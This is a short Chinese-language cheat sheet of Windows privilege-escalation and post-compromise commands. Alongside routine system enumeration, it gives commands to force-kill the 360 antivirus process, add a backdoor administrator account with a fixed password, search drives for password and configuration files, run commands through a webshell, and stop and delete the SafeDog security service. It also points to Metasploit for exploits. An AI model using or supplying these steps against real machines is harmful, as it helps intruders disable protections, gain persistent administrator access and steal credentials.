Windows系统提权基础命令
- 查看IP
ipconfig /all
- 获取端口信息
netstat -an netstat -ano netstat -anb
3. 获取服务信息
net start
4. 获取进程信息
tasklist /svc
5. 进程结束命令
taskkill /im 360tray.exe /f
taskkill /pid 452(进程号) /F
6. 用户管理员命令,添加用户huahua为管理员
net user huahua huahua123456 /add
net Localgroup Administrators huahua /add
- 查看当前系统管理员用户
net Localgroup Administrators
Windows提权信息的收集
- 操作系统的名称和版本信息收集
systeminfo,hostname, set(环境变量)
2. 查看用户信息
net user
query user (查看远程终端在线用户)
- 查看远程端口
通过注册表产看,或 netstat -ano | find “3389”
- 查看网络情况
route print (路由器信息)
arp -a (查看arp缓存)
netsh firewall show config(防火墙规则)
wmic service list brief (查看服务命令)
wmic process list brief (查看进程命令)
- 检索敏感文件
dir /b /s password.txt
dir /b /s config.* filename(配置文件)
dir /b /s *.doc
dir /b /s *.docx
dir /b /s *.ppt
- 目录文件操作
for /d %i in (d:\Github*) do @echo %i (列出Github下的目录)
for /f %i in (d:\test.txt) do @echo %i (显示test.txt文件中的内容)
Windows提权准备
- 收集编译相关poc
- 免杀 操作系统没有安装杀毒软件则不用
- 上传poc
- 由webshell或者反弹webshell来执行命令
- 网站搜索相应的CVE编号漏洞
6 使用MSF平台搜索可利用的POC,search ms15(15年的EXploit) search ms13(13年的)
7. 可以通过微软网站查看漏洞对应的版本,https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/ms17-005
8. 停用安全狗
如果是system权限,可以采用如下方法停用
net stop “Safedog Guard Center”
直接删除安全狗服务
sc delete “SafeDogGuardCenter”